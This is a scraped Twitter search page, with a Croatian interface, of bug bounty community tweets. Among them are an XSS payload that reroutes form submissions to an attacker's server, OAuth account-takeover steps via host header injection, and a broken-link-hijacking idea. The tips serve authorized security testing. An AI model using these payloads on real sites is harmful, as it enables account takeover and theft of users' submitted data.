Rezultati pretraživanja
  1. 30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    Prikaži ovu nit
  2. 31. sij

    Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by

  3. 29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
  4. 31. sij
  5. 28. sij
  6. 2. velj

    WooT! There is always a way. New short write up! Chain the bugs till you get what you want. Some steps were not mentionned. RT, Like and Comments are appreciated. For any pentest work DM me:) 🎉🎉

    Prikaži ovu nit
  7. 29. sij

    My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community. A special Thanks to Sir & Sir for the guidance.

  8. 1. velj
  9. prije 7 sati

    Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program.

  10. 30. sij

    Episode #2 - We sit down with to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on

    Prikaži ovu nit
  11. prije 1 sat

    Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use 's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'

  12. hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ?

  13. prije 3 sata
    Odgovor korisniku/ci

    Next time add to your post to get maximum profit

  14. 2. velj

    BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins 😈 buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW

  15. 2. velj

    Thanks for the awesome shoutout in your video !

  16. 31. sij

    Any good external bug bounty program?

  17. 31. sij

    Do you know any labs (free or paid ) to practice new CVEs online? Except and pentesteracademy

    Prikaži ovu nit
  18. 31. sij

    Install Python. Open yourself up to a word of open-source bug bounty tools. Don't put it off, because it will enrich your skills.

  19. 30. sij

    Button disabled? Inspect Element -> change from "disabled" to "enabeld" -> Button enabeld and action performed 💪🏻😆

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.